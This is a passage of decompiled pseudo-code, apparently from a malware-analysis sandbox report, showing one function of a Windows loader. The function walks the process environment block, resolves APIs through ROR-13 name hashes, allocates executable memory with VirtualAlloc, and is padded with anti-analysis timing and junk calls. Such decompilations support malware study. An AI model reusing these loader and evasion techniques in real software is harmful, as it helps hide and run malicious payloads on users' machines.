C-Code - Quality: 19%

			E615A6620(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi) {
				void* _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				void* _v28;
				signed char _v36;
				intOrPtr* _v40;
				void* _v44;
				signed char _v48;
				signed int _v52;
				signed int _v60;
				char _v61;
				signed int _v68;
				signed int* _v72;
				signed int _v76;
				signed char _v80;
				signed int _v88;
				signed char _v92;
				intOrPtr* _v96;
				intOrPtr* _v100;
				intOrPtr _v104;
				intOrPtr _v112;
				signed int _v113;
				short _v120;
				signed int _v128;
				signed char _v136;
				signed int _v144;
				signed short* _v152;
				intOrPtr _v156;
				signed char _v160;
				intOrPtr* _v188;
				signed int _v200;
				signed int _v236;
				signed char _v240;
				intOrPtr _v244;
				signed char _v268;
				signed int _v284;
				intOrPtr _v288;
				intOrPtr _v296;
				intOrPtr* _v312;
				signed int _v316;
				signed int _v320;
				intOrPtr _v332;
				intOrPtr _v412;
				char _v416;
				intOrPtr _v420;
				intOrPtr _v424;
				intOrPtr _v428;
				intOrPtr _v432;
				intOrPtr _v440;
				char _v444;
				intOrPtr* _v448;
				signed int _t420;
				signed int _t421;
				signed int _t422;
				void* _t427;
				signed int _t428;
				intOrPtr* _t430;
				signed char _t434;
				signed int _t441;
				signed int _t453;
				intOrPtr* _t455;
				signed char _t456;
				intOrPtr _t461;
				signed int _t462;
				short _t464;
				void* _t465;
				intOrPtr* _t468;
				signed int _t471;
				void* _t479;
				signed char _t480;
				signed char _t481;
				signed char _t483;
				signed int _t486;
				signed int _t498;
				void* _t501;
				int _t503;
				void* _t504;
				void* _t505;
				void* _t509;
				void* _t510;
				void* _t511;
				void* _t512;
				void* _t513;
				void* _t517;
				signed char _t520;
				signed char _t521;
				void* _t524;
				void* _t528;
				signed int* _t531;
				void* _t533;
				signed char _t543;
				void* _t544;
				signed int _t545;
				char _t555;
				signed char _t557;
				void* _t559;
				void* _t560;
				void* _t562;
				void* _t563;
				void* _t565;
				void* _t568;
				void* _t569;
				intOrPtr _t580;
				void* _t582;
				signed char _t583;
				signed int _t585;
				signed int _t589;
				signed char _t592;
				signed char _t595;
				signed char _t596;
				signed char _t601;
				void* _t608;
				void* _t609;
				signed int _t615;
				signed int _t617;
				signed char _t618;
				signed char _t623;
				signed char _t626;
				void* _t628;
				signed char _t631;
				long _t632;
				signed char _t640;
				signed char _t652;
				void* _t654;
				void* _t655;
				void* _t656;
				signed int _t658;
				signed int _t659;
				void* _t661;
				void* _t665;
				void* _t668;
				signed char _t670;
				signed char _t671;
				void* _t674;
				intOrPtr _t678;
				signed char _t679;
				signed char _t680;
				signed int _t684;
				signed int _t685;
				void* _t691;
				void* _t695;
				signed int* _t697;
				signed int _t707;
				signed int _t709;
				signed int _t713;
				signed int _t714;
				signed int _t718;
				signed int _t719;
				signed int _t729;
				signed int _t739;
				char* _t748;
				signed char _t749;
				signed char _t750;
				long _t772;
				signed short* _t774;
				intOrPtr* _t775;
				signed int _t776;
				intOrPtr _t797;
				intOrPtr _t798;
				signed int _t802;
				signed char _t808;
				void* _t814;
				signed int _t815;
				signed int _t819;
				void* _t821;
				signed int _t822;
				signed int _t823;
				signed int _t827;
				intOrPtr* _t829;
				void* _t838;
				signed int _t841;
				intOrPtr* _t842;
				signed int _t843;
				intOrPtr* _t844;
				signed int _t845;
				void* _t848;
				intOrPtr* _t850;
				signed int _t851;
				unsigned int _t853;
				signed char _t854;
				intOrPtr _t856;
				signed int _t857;
				signed int _t858;
				intOrPtr* _t859;
				signed char _t860;
				signed int _t864;
				signed short _t865;
				signed int _t866;
				void* _t868;
				signed short* _t870;
				void* _t871;
				signed char _t872;
				void* _t873;
				intOrPtr* _t874;
				signed int _t877;
				signed int _t879;
				signed int _t880;
				signed int _t881;
				intOrPtr* _t882;
				signed int _t884;
				void* _t886;
				intOrPtr* _t887;
				void* _t888;
				signed int _t889;
				intOrPtr* _t891;
				signed char _t893;
				signed short* _t894;
				unsigned short _t896;
				signed int _t898;
				signed int _t900;
				signed int _t902;
				signed int* _t904;
				signed int _t905;
				signed char _t906;
				signed int _t907;
				intOrPtr* _t909;
				signed int _t912;
				void* _t913;
				intOrPtr _t914;

				_t674 = __ecx;
				_push(0xffffffff);
				_push(E615D93D0);
				_push( *[fs:0x0]);
				_t914 = _t913 - 0x1b0;
				_t420 =  *0x615ef008; // 0x3f3f20bc
				_t421 = _t420 ^ _t912;
				_v24 = _t421;
				_push(__esi);
				_push(_t421);
				_t422 =  &_v16;
				 *[fs:0x0] = _t422;
				_v20 = _t914;
				asm("movups xmm0, [ebp+0x8]");
				asm("movups [ebp-0x1bc], xmm0");
				asm("movups xmm0, [ebp+0x18]");
				asm("movups [ebp-0x1ac], xmm0");
				asm("movups xmm0, [ebp+0x28]");
				asm("movups [ebp-0x19c], xmm0");
				asm("rdtscp");
				_v28 = __ecx;
				if(__edx != 0 || _t422 > 0x989680) {
					_t841 = 0xc2869da;
				} else {
					asm("rdtscp");
					_v28 = __ecx;
					_t841 = _t422;
				}
				asm("rdtscp");
				_v28 = _t674;
				_t427 = E615D8A60(_t422 * 0x85d6, 0 + (_t422 * 0x85d6 >> 0x20), 0x5f, 0);
				asm("movd xmm0, edi");
				_t428 = _t427 + 3;
				asm("cvtdq2ps xmm0, xmm0");
				_t877 = _t428;
				_v112 = _t428;
				_v60 = _t877;
				_v288 = _t877;
				_v156 = _t877;
				asm("movss [ebp-0x1c], xmm0");
				asm("movss [ebp-0x24], xmm0");
				asm("xorps xmm0, xmm0");
				asm("movsd [ebp-0xd4], xmm0");
				asm("movsd [ebp-0x170], xmm0");
				asm("movsd xmm0, [0x615e9698]");
				asm("movsd [ebp-0xdc], xmm0");
				asm("movsd xmm0, [0x615e9558]");
				asm("movsd [ebp-0xac], xmm0");
				asm("movsd [ebp-0xe4], xmm0");
				asm("movsd xmm0, [0x615e96c8]");
				_v236 = 0;
				_v316 = 0;
				_v200 = 0;
				_v320 = 0;
				_v128 = 0;
				_v284 = 0;
				_v68 = 0;
				asm("movsd [ebp-0x178], xmm0");
				asm("movsd [ebp-0x90], xmm0");
				__imp__GetTickCount64();
				__imp__GetTickCount64();
				_t430 = _v448;
				_v188 = _t430;
				_v332 = _t430;
				_t432 =  !=  ? _t841 : _t877;
				_v8 = 0;
				_t842 = _v448;
				_v44 =  !=  ? _t841 : _t877;
				while(1) {
					__imp__GetTickCount64();
					__imp__GetTickCount64();
					if( *_t842 != 0x5a4d) {
						goto L256;
					}
					_t678 =  *((intOrPtr*)(_t842 + 0x3c));
					_t434 = _t678 - 0x40;
					if(_t434 > 0x3bf) {
						goto L256;
					}
					_t679 = _t678 + _t842;
					_v36 = _t679;
					_v268 = _t679;
					if( *_t679 != 0x4550) {
						goto L256;
					}
					_t814 = _v44;
					_v8 = 0xffffffff;
					_t680 =  *[fs:0x30];
					asm("movss xmm0, [0x615e9774]");
					_v48 = _t680;
					_v240 = _t680;
					asm("movss [ebp-0xf8], xmm0");
					if(_t814 == _t877) {
						asm("movss xmm1, [0x615e96dc]");
						asm("movsd xmm2, [0x615e9610]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [ebp-0x1c]");
						asm("ucomiss xmm0, xmm1");
						asm("movsd [ebp-0x34], xmm2");
						asm("movss [ebp-0xa0], xmm1");
						asm("lahf");
						__eflags = _t434 & 0x00000044;
						if((_t434 & 0x00000044) != 0) {
							L13:
							_v61 = 0x3f;
							_v28 = 0xb;
							_v88 = 0x15;
							goto L14;
							L18:
							asm("movss xmm0, [0x615e974c]");
							asm("comiss xmm1, xmm0");
							asm("movss [ebp-0x24], xmm1");
							asm("movss [ebp-0x1c], xmm1");
							asm("movss [ebp-0x48], xmm0");
							if(__eflags <= 0) {
								L21:
								_t843 = _v68;
								_t814 = _v44;
								goto L22;
							} else {
								_t874 = __imp__CoFreeUnusedLibraries;
								do {
									 *_t874();
									asm("cdq");
									_push(_t814);
									_push(0x6b);
									E615A5A30();
									asm("cvttsd2si esi, xmm0");
									_t914 = _t914 + 8;
									asm("movd xmm0, esi");
									asm("cvtdq2ps xmm0, xmm0");
									asm("comiss xmm0, [ebp-0x48]");
									asm("movss [ebp-0x1c], xmm0");
									asm("movss [ebp-0x24], xmm0");
								} while (__eflags > 0);
								goto L21;
							}
							L14:
							__imp__GetShellWindow();
							_v61 = E615A5EE0(_v61, _t814);
							asm("cdq");
							_push(_t814);
							_push(_v28);
							E615A5A30();
							_t914 = _t914 + 8;
							asm("cvttsd2si edx, xmm0");
							_t684 = _v88 * _t814;
							_v28 = _t814;
							_v88 = _t684;
							_v113 = _t814 - _t684;
							_t685 = _t684;
							_t441 = _t814;
							asm("cdq");
							_t814 = _t441 % _t685;
							_t443 = _t441 / _t685 * _v113;
							asm("movd xmm0, ecx");
							asm("cvtdq2ps xmm0, xmm0");
							asm("ucomiss xmm0, [ebp-0xa0]");
							asm("lahf");
							__eflags = _t441 / _t685 * _v113 & 0x00000044;
							if(__eflags != 0) {
								goto L14;
							} else {
								asm("comiss xmm0, [0x615e9730]");
								if(__eflags <= 0) {
									GetOEMCP();
									E615D8E30(E615A5D90(), _t445);
									asm("movss xmm2, [0x615e9560]");
									asm("xorps xmm1, xmm1");
									asm("cvtsd2ss xmm1, xmm0");
									asm("movss [ebp-0xa4], xmm2");
									asm("addss xmm1, xmm2");
								} else {
									asm("movss xmm0, [0x615e96f0]");
									_t668 = E615D8AFE(_t443);
									_push(_t814);
									_push(_t668);
									E615A5A30();
									asm("movss xmm1, [0x615e97b0]");
									_t914 = _t914 + 8;
									asm("cvtsd2ss xmm0, xmm0");
									asm("subss xmm1, xmm0");
									asm("movss xmm0, [0x615e9560]");
									asm("movss [ebp-0xa4], xmm0");
								}
								goto L18;
							}
						} else {
							asm("movsd xmm3, [0x615e95a0]");
							asm("movsd [ebp-0xc0], xmm3");
							do {
								asm("cvttsd2si ecx, xmm2");
								E615A5D90();
								asm("movsd xmm1, [ebp-0x34]");
								asm("movd xmm0, esi");
								asm("cvtdq2pd xmm0, xmm0");
								asm("subsd xmm1, xmm0");
								asm("movss xmm0, [ebp-0x18]");
								asm("movsd [ebp-0x34], xmm1");
								_t670 = E615A5C20(_t680, _t814);
								asm("movsd xmm2, [ebp-0x34]");
								asm("movaps xmm4, xmm0");
								asm("movd xmm1, esi");
								asm("cvtdq2pd xmm1, xmm1");
								asm("movsd xmm0, [ebp-0xc0]");
								asm("divsd xmm1, xmm2");
								asm("addsd xmm0, xmm2");
								asm("movss [ebp-0x18], xmm4");
								asm("cvttsd2si eax, xmm0");
								asm("xorps xmm0, xmm0");
								_t671 = _t670;
								asm("cvtss2sd xmm0, xmm4");
								asm("movd xmm3, eax");
								asm("cvtdq2pd xmm3, xmm3");
								asm("subsd xmm1, xmm0");
								asm("movsd [ebp-0xc0], xmm3");
								asm("addsd xmm1, xmm3");
								asm("cvtpd2ps xmm0, xmm1");
								asm("ucomiss xmm0, [ebp-0xa0]");
								asm("lahf");
								__eflags = _t671 & 0x00000044;
							} while ((_t671 & 0x00000044) != 0);
							goto L13;
						}
					} else {
						_t808 =  *(_t680 + 0xc);
						asm("movss xmm0, [0x615e96dc]");
						asm("movss xmm2, [0x615e9560]");
						_v48 = _t808;
						_t843 =  *((intOrPtr*)(_t808 + 0x14));
						_v240 = _t808;
						_v68 = _t843;
						asm("movss [ebp-0xa0], xmm0");
						asm("movss [ebp-0xa4], xmm2");
						L22:
						asm("xorps xmm0, xmm0");
						asm("movss [ebp-0x110], xmm0");
						asm("movss xmm0, [0x615e9760]");
						asm("movss [ebp-0x80], xmm0");
						asm("movsd xmm0, [0x615e95f8]");
						asm("movsd [ebp-0x150], xmm0");
						asm("movss xmm0, [0x615e97ac]");
						asm("movss [ebp-0xf4], xmm0");
						asm("movss xmm0, [0x615e9708]");
						asm("movss [ebp-0xcc], xmm0");
						asm("movss xmm0, [0x615e9728]");
						asm("movss [ebp-0x5c], xmm0");
						asm("movss xmm0, [0x615e9768]");
						asm("movss [ebp-0xc8], xmm0");
						asm("movss xmm0, [0x615e95c8]");
						asm("movss [ebp-0x120], xmm0");
						asm("movss xmm0, [0x615e9750]");
						asm("movss [ebp-0x104], xmm0");
						asm("movss xmm0, [0x615e96f8]");
						asm("movss [ebp-0x128], xmm0");
						asm("movss xmm0, [0x615e9794]");
						asm("movss [ebp-0x12c], xmm0");
						asm("movsd xmm0, [0x615e9588]");
						asm("movsd [ebp-0x180], xmm0");
						asm("movss xmm0, [0x615e96b8]");
						asm("movss [ebp-0x130], xmm0");
						asm("movss xmm0, [0x615e9720]");
						asm("movss [ebp-0x78], xmm0");
						asm("movsd xmm0, [0x615e95d8]");
						asm("movsd [ebp-0xc0], xmm0");
						asm("movss xmm0, [0x615e96e4]");
						asm("movss [ebp-0x100], xmm0");
						asm("movsd xmm0, [0x615e95a8]");
						asm("movsd [ebp-0x188], xmm0");
						asm("movss xmm0, [0x615e96ac]");
						asm("movss [ebp-0x18], xmm0");
						asm("movss xmm0, [0x615e9748]");
						asm("movss [ebp-0x140], xmm0");
						asm("movsd xmm0, [0x615e9600]");
						asm("movsd [ebp-0x168], xmm0");
						asm("movss xmm0, [0x615e978c]");
						asm("movss [ebp-0x144], xmm0");
						asm("movsd xmm0, [0x615e9580]");
						asm("movsd [ebp-0xb4], xmm0");
						asm("movss xmm0, [0x615e9714]");
						asm("movss [ebp-0xfc], xmm0");
						asm("movss xmm0, [0x615e975c]");
						asm("movss [ebp-0x154], xmm0");
						asm("movss xmm0, [0x615e96b4]");
						asm("movss [ebp-0x54], xmm0");
						asm("movss xmm0, [0x615e9718]");
						asm("movss [ebp-0x158], xmm0");
						asm("movss xmm0, [0x615e9784]");
						_v244 = _v296;
						asm("movss [ebp-0x15c], xmm0");
						asm("movss xmm0, [0x615e9578]");
						_v160 = _v92;
						asm("movss [ebp-0x160], xmm0");
						asm("movss xmm0, [0x615e9710]");
						_v152 = _v76;
						_v100 = _v312;
						asm("movss [ebp-0x114], xmm0");
						while(_t843 != 0) {
							while(1) {
								_v104 = _t580;
								if(_t580 == 0) {
									break;
								}
								if(_t814 + 4 <= _v60) {
									asm("comiss xmm1, xmm2");
									if(__eflags < 0) {
										asm("pause");
										_t640 = E615D8E30(E615A5D90(), _t639);
										asm("movaps xmm1, xmm0");
										asm("xorps xmm2, xmm2");
										asm("mulsd xmm0, [ebp-0x150]");
										asm("mulsd xmm1, [ebp-0xd4]");
										asm("divsd xmm1, xmm0");
										asm("movss xmm0, [ebp-0xf4]");
										asm("cvtsd2ss xmm2, xmm1");
										asm("comiss xmm0, xmm2");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										if(__eflags < 0) {
											goto L33;
										}
										goto L32;
									} else {
										GetCommandLineW();
										L32:
										_t661 = E615A5EE0(0x21, _t814);
										asm("cdq");
										_t640 = E615D8E30(E615D8160(_t661, _t814, 0x2c, 0), _t663);
										asm("xorps xmm2, xmm2");
										asm("cvtsd2ss xmm2, xmm0");
										asm("movss [ebp-0x1c], xmm2");
										asm("movss [ebp-0x24], xmm2");
										L33:
										asm("ucomiss xmm2, [ebp-0xcc]");
										asm("lahf");
										__eflags = _t640 & 0x00000044;
										if(__eflags == 0) {
											EmptyClipboard();
											asm("movss xmm2, [ebp-0xa4]");
											asm("movss [ebp-0x1c], xmm2");
											asm("movss [ebp-0x24], xmm2");
										}
										goto L35;
									}
								} else {
									_t814 = 0xd;
									_t665 = E615A8A10(_t868, 0xd, _t904);
									asm("movss xmm2, [ebp-0x1c]");
									_t868 = _t665;
									L35:
									_t802 =  *_t904;
									if(_t802 < 0x61) {
										_t838 = _v44;
										__eflags = _t838 - _v156;
										_t642 =  !=  ? _t838 : _v112;
										_v8 = 0xffffffff;
										_t814 =  !=  ? _t838 : _v112;
										_v44 = _t814;
										L39:
										_t868 = _t868 + (_t802 & 0x000000ff);
										if(_t814 == _v60) {
											asm("comiss xmm2, [ebp-0x120]");
											if(__eflags >= 0) {
												asm("movss xmm0, [ebp-0x5c]");
												E615A5C20(_t802, _t814);
												asm("cvttss2si esi, xmm0");
												asm("movss xmm0, [ebp-0x5c]");
												E615A5C20(_t802, _t814);
												asm("movd xmm1, esi");
												asm("cvtdq2ps xmm1, xmm1");
												asm("cvttss2si ecx, xmm0");
												asm("movss [ebp-0x30], xmm0");
												asm("movss [ebp-0x1c], xmm1");
												E615A5EE0(_t802, _t814);
												asm("movss xmm1, [ebp-0x30]");
												asm("movss xmm2, [ebp-0x1c]");
												_t904 = _v72;
												asm("movd xmm0, eax");
												asm("cvtdq2ps xmm0, xmm0");
												_t814 = _v44;
												asm("divss xmm1, xmm0");
												asm("subss xmm2, xmm1");
												asm("movss [ebp-0x1c], xmm2");
												asm("movss [ebp-0x24], xmm2");
											}
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
										} else {
											_t904 = _t904 + 1;
											asm("movss xmm1, [ebp-0x80]");
											_t580 = _v104 + 0xffff;
											_v72 = _t904;
										}
										continue;
									}
									asm("cdq");
									_t651 = _v44 - _t814 >> 1;
									if(_v44 - _t814 >> 1 < _v60) {
										asm("movss xmm1, [0x615e96f4]");
										asm("movsd xmm3, [0x615e95b8]");
										asm("movss xmm0, [0x615e9734]");
										asm("movss [ebp-0x4c], xmm1");
										asm("movsd xmm1, [0x615e9628]");
										asm("movsd [ebp-0x90], xmm1");
										asm("movss xmm1, [0x615e9764]");
										asm("movss [ebp-0x84], xmm1");
										asm("movss xmm1, [0x615e9564]");
										asm("movsd [ebp-0xc0], xmm3");
										asm("movss [ebp-0x80], xmm0");
										asm("movss [ebp-0x108], xmm1");
										while(1) {
											_t873 = 0;
											__eflags = 0;
											asm("movsd [ebp-0xac], xmm3");
											asm("comiss xmm0, xmm2");
											_t910 = 0x32;
											if(0 < 0) {
												goto L48;
											}
											_t839 = 0;
											_t806 = 0x32;
											E615D8E30(_t651, 0x32);
											asm("movsd xmm1, [ebp-0xac]");
											asm("movaps xmm2, xmm0");
											asm("movsd [ebp-0x150], xmm2");
											do {
												asm("cvtpd2ps xmm0, xmm1");
												_t654 = E615A5C20(_t806, _t839);
												_t839 = _t873;
												asm("movss [ebp-0x64], xmm0");
												_t655 = E615D8E30(_t654, _t910);
												asm("movss xmm2, [ebp-0x64]");
												asm("cvtsd2ss xmm0, xmm0");
												asm("movaps xmm1, xmm2");
												asm("subss xmm1, xmm0");
												asm("cvtps2pd xmm0, xmm2");
												asm("movss [ebp-0x30], xmm1");
												asm("movsd xmm1, [ebp-0xac]");
												asm("addsd xmm1, [ebp-0x150]");
												asm("divsd xmm0, xmm1");
												asm("movsd [ebp-0xac], xmm1");
												_t656 = E615D8CDF(_t655);
												_t910 = _t656;
												_t806 = _t656;
												E615D8E30(_t656, _t656);
												asm("movsd xmm1, [ebp-0xac]");
												asm("movaps xmm2, xmm0");
												asm("movss xmm0, [ebp-0x30]");
												asm("addss xmm0, [ebp-0x64]");
												asm("movsd [ebp-0x150], xmm2");
												asm("cvtps2pd xmm0, xmm0");
												asm("addsd xmm0, xmm1");
												asm("addsd xmm0, xmm2");
												asm("movss xmm2, [ebp-0x80]");
												asm("cvtpd2ps xmm0, xmm0");
												asm("comiss xmm2, xmm0");
											} while (__eflags >= 0);
											L48:
											asm("movss xmm0, [0x615e9730]");
											asm("movss [ebp-0x64], xmm0");
											do {
												__imp__GetCurrentProcessorNumber();
												asm("movss xmm0, [ebp-0x64]");
												_t652 = E615A5C20(_t802, _t814);
												asm("movss xmm1, [ebp-0x4c]");
												asm("cvtss2sd xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm0");
												asm("comiss xmm1, xmm0");
												asm("movss [ebp-0x64], xmm0");
											} while (__eflags > 0);
											asm("movss xmm2, [ebp-0xcc]");
											asm("movsd xmm1, [ebp-0x90]");
											asm("ucomiss xmm0, xmm2");
											asm("lahf");
											__eflags = _t652 & 0x00000044;
											if(__eflags != 0) {
												L52:
												asm("comiss xmm0, [ebp-0x84]");
												if(__eflags <= 0) {
													asm("movss xmm0, [0x615e9788]");
													_t651 = E615A5C20(_t802, _t814);
													asm("movss xmm2, [ebp-0x110]");
													asm("subss xmm2, xmm0");
												} else {
													_t802 = 1;
													_t659 = E615A5D90();
													asm("movss xmm2, [ebp-0x108]");
													_t651 = _t659;
													asm("movd xmm0, eax");
													asm("cvtdq2ps xmm0, xmm0");
													asm("divss xmm2, xmm0");
													asm("subss xmm2, [0x615e97b4]");
												}
												asm("comiss xmm2, [ebp-0x5c]");
												asm("movss xmm0, [ebp-0x80]");
												asm("movsd xmm3, [ebp-0xc0]");
												if(__eflags > 0) {
													asm("movss xmm0, [ebp-0xc8]");
													_t658 = E615A5C20(_t802, _t814);
													asm("cvttss2si eax, xmm0");
													asm("movsd xmm3, [ebp-0xc0]");
													_t651 = _t658 * 0xffffffe8;
													asm("movd xmm0, eax");
													asm("cvtdq2pd xmm0, xmm0");
													asm("cvtpd2ps xmm2, xmm0");
													asm("movss xmm0, [ebp-0x80]");
												}
												continue;
											} else {
												goto L51;
											}
											do {
												L51:
												asm("movaps xmm0, xmm1");
												asm("mulsd xmm1, xmm0");
												asm("xorps xmm0, xmm0");
												asm("cvtsd2ss xmm0, xmm1");
												asm("ucomiss xmm0, xmm2");
												asm("lahf");
												__eflags = _t652 & 0x00000044;
											} while (__eflags != 0);
											goto L52;
										}
									} else {
										_t814 = _v44;
										_t868 = _t868 + 0xffffffe0;
										goto L39;
									}
								}
							}
							_t905 = _v60;
							__eflags = _t868 - 0x6a4abc5b;
							if(_t868 != 0x6a4abc5b) {
								L112:
								__eflags = _v236;
								if(__eflags == 0) {
									L126:
									_t843 =  *_v68;
									_v68 = _t843;
									continue;
								}
								__eflags = _v200;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _v128;
								if(__eflags == 0) {
									goto L126;
								}
								__eflags = _t814 - _t905;
								if(__eflags > 0) {
									_t814 = 0x91afca54;
									E615A8A50(0x91afca54);
									_t772 =  *((intOrPtr*)(_v36 + 0x50)) + 0xc;
									__eflags = _t772;
									_t582 = VirtualAlloc(0, _t772, 0x3000, 0x40); // executed
									_v48 = _t582;
									break;
								}
								asm("movss xmm0, [ebp-0x1c]");
								asm("o16 nop [eax+eax]");
								L117:
								asm("comiss xmm0, [0x615e9798]");
								if(__eflags > 0) {
									_t580 = E615D8E30(_t580, 0x32);
									asm("cvtsd2ss xmm0, xmm0");
								}
								goto L117;
							}
							__eflags = _t814 - _t905;
							if(_t814 <= _t905) {
								__eflags = _v120;
								if(_v120 <= 0) {
									goto L112;
								}
								_t583 = _v160;
								_t774 = _v152;
								_t906 = _v48;
								while(1) {
									L63:
									_v92 = _t583;
									_t870 = _t774;
									_v76 = _t870;
									_t775 =  *_t583 + _t906;
									_t907 = 0;
									__eflags = 0;
									_t585 =  *_t775;
									do {
										L64:
										asm("ror esi, 0xd");
										_t775 = _t775 + 1;
										_t907 = _t907 + _t585;
										_t585 =  *_t775;
										__eflags = _t585;
									} while (_t585 != 0);
									_v52 = _t907;
									__eflags = _t907 - 0xec0e4e8e;
									if(_t907 == 0xec0e4e8e) {
										L68:
										_t776 = _v60;
										_t871 = _t814;
										__eflags = _t814 - _t776;
										if(_t814 <= _t776) {
											L84:
											_t872 = _v48;
											_t777 = _v100;
											L85:
											__eflags = _t907 - 0xec0e4e8e;
											if(_t907 != 0xec0e4e8e) {
												__eflags = _t907 - 0x7c0dfcaa;
												if(_t907 != 0x7c0dfcaa) {
													__eflags = _t907 - 0x91afca54;
													if(_t907 == 0x91afca54) {
														__eflags = _t814 - _v60;
														if(_t814 > _v60) {
															_t589 =  *_t777 + _t872;
															__eflags = _t589;
															_v128 = _t589;
															_v284 = _t589;
														}
													}
													L109:
													_t194 =  &_v120;
													 *_t194 = _v120 + 0xffff;
													__eflags =  *_t194;
													_t814 = _v44;
													_t870 = _v76;
													L110:
													__eflags = _t814 - _v288;
													_t774 =  <=  ? _t870 :  &(_t870[1]);
													_v152 = _t774;
													_t583 =  <=  ? _v92 : _v92 + 4;
													__eflags = _v120;
													_t906 = _v48;
													if(_v120 > 0) {
														asm("movss xmm2, [ebp-0x1c]");
														L63:
														_v92 = _t583;
														_t870 = _t774;
														_v76 = _t870;
														_t775 =  *_t583 + _t906;
														_t907 = 0;
														__eflags = 0;
														_t585 =  *_t775;
														goto L64;
													}
													_t905 = _v60;
													_v160 = _t583;
													_v92 = _t583;
													_v152 = _t774;
													_v76 = _t774;
													goto L112;
												}
												asm("cdq");
												_t592 = _t814 - _t814 >> 1;
												__eflags = _t592 - _v60;
												if(__eflags < 0) {
													asm("comiss xmm2, [ebp-0x100]");
													asm("movsd xmm1, [ebp-0xc0]");
													asm("movsd [ebp-0x34], xmm1");
													if(__eflags < 0) {
														L95:
														asm("movss xmm0, [ebp-0xc8]");
														asm("comiss xmm0, xmm2");
														if(__eflags >= 0) {
															GetSystemDefaultLangID();
															asm("movss xmm0, [ebp-0x18]");
															E615A5C20(_t777, _t814);
															asm("xorps xmm1, xmm1");
															asm("cvtss2sd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t608 = E615D8E30(E615A5D90(), _t607);
															asm("movsd [ebp-0x50], xmm0");
															_t609 = E615D8CDF(_t608);
															_push(_t814);
															_push(_t609);
															E615A5A30();
															asm("movsd xmm1, [ebp-0x34]");
															_t914 = _t914 + 8;
															asm("divsd xmm1, [ebp-0x50]");
															_t814 = 0;
															_t777 = 0xc4;
															asm("cvttsd2si eax, xmm0");
															asm("movd xmm0, eax");
															asm("cvtdq2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("movsd [ebp-0x34], xmm1");
															_t592 = E615D8E30(_t609, 0xc4);
															asm("movsd xmm1, [ebp-0x34]");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xa0]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if((_t592 & 0x00000044) == 0) {
															asm("movss xmm0, [ebp-0x140]");
															E615A5C20(_t777, _t814);
															asm("cvtss2sd xmm0, xmm0");
															asm("movsd [ebp-0x50], xmm0");
															asm("mulsd xmm0, [ebp-0x168]");
															asm("cvttsd2si esi, xmm0");
															E615D8E30(E615A5EE0(0x71, _t814), _t603);
															asm("cvtsd2ss xmm0, xmm0");
															asm("movss [ebp-0x30], xmm0");
															asm("movss xmm0, [ebp-0x144]");
															_t592 = E615A5C20(_t603, _t814);
															asm("movsd xmm1, [ebp-0x50]");
															asm("cvttss2si eax, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, esi");
															asm("divsd xmm1, xmm0");
															asm("movss xmm0, [ebp-0x30]");
															asm("cvtps2pd xmm0, xmm0");
															asm("divsd xmm1, xmm0");
															asm("xorps xmm0, xmm0");
															asm("cvtsi2sd xmm0, eax");
															asm("addsd xmm1, xmm0");
															asm("cvtpd2ps xmm2, xmm1");
														}
														asm("ucomiss xmm2, [ebp-0xfc]");
														asm("movsd xmm3, [ebp-0xb4]");
														asm("lahf");
														__eflags = _t592 & 0x00000044;
														if(__eflags != 0) {
															L101:
															asm("movss xmm0, [ebp-0x154]");
															asm("comiss xmm0, xmm2");
															if(__eflags < 0) {
																E615D8E30(E615A5D90(), _t593);
																asm("xorps xmm1, xmm1");
																asm("cvtsd2ss xmm1, xmm0");
																asm("movss xmm0, [ebp-0x158]");
																asm("divss xmm0, xmm1");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x30], xmm0");
																_t595 = E615A5D90();
																asm("movss xmm0, [ebp-0x15c]");
																asm("divss xmm0, [ebp-0x30]");
																_t596 = _t595;
																asm("movss xmm1, [ebp-0x1c]");
																asm("subss xmm1, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("addss xmm1, xmm0");
															} else {
																_t601 = E615A5EE0(0x33, _t814);
																asm("movss xmm1, [ebp-0x54]");
																_t596 = _t601;
																asm("movd xmm0, eax");
																asm("cvtdq2ps xmm0, xmm0");
																asm("divss xmm1, xmm0");
																asm("addss xmm1, [ebp-0x110]");
															}
															asm("ucomiss xmm1, [ebp-0x160]");
															asm("movss [ebp-0x24], xmm1");
															asm("movss [ebp-0x1c], xmm1");
															asm("lahf");
															__eflags = _t596 & 0x00000044;
															if((_t596 & 0x00000044) == 0) {
																E615D8E30(_t596, 0x12);
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm0, [ebp-0x114]");
																asm("movss [ebp-0x4c], xmm0");
																_v52 = E615A5EE0(0x47, 0);
																E615D8E30(E615A5EE0(_t598, 0), _t599);
																asm("movd xmm1, dword [ebp-0x30]");
																asm("cvtdq2ps xmm1, xmm1");
																asm("cvtsd2ss xmm0, xmm0");
																asm("addss xmm1, [ebp-0x4c]");
																asm("addss xmm1, xmm0");
																asm("movss [ebp-0x1c], xmm1");
																asm("movss [ebp-0x24], xmm1");
															}
															goto L109;
														} else {
															do {
																asm("movaps xmm0, xmm3");
																_t592 = E615D8CDF(_t592);
																_push(_t814);
																_push(_t592);
																E615A5A30();
																asm("movaps xmm3, xmm0");
																asm("xorps xmm2, xmm2");
																asm("mulsd xmm0, xmm3");
																asm("movaps xmm1, xmm3");
																_t914 = _t914 + 8;
																asm("cvttsd2si eax, xmm0");
																asm("movd xmm0, eax");
																asm("cvtdq2pd xmm0, xmm0");
																asm("subsd xmm1, xmm0");
																asm("cvtsd2ss xmm2, xmm1");
																asm("ucomiss xmm2, [ebp-0xfc]");
																asm("lahf");
																__eflags = _t592 & 0x00000044;
															} while (__eflags != 0);
															goto L101;
														}
													}
													asm("movss xmm0, [ebp-0x104]");
													asm("movss [ebp-0x64], xmm0");
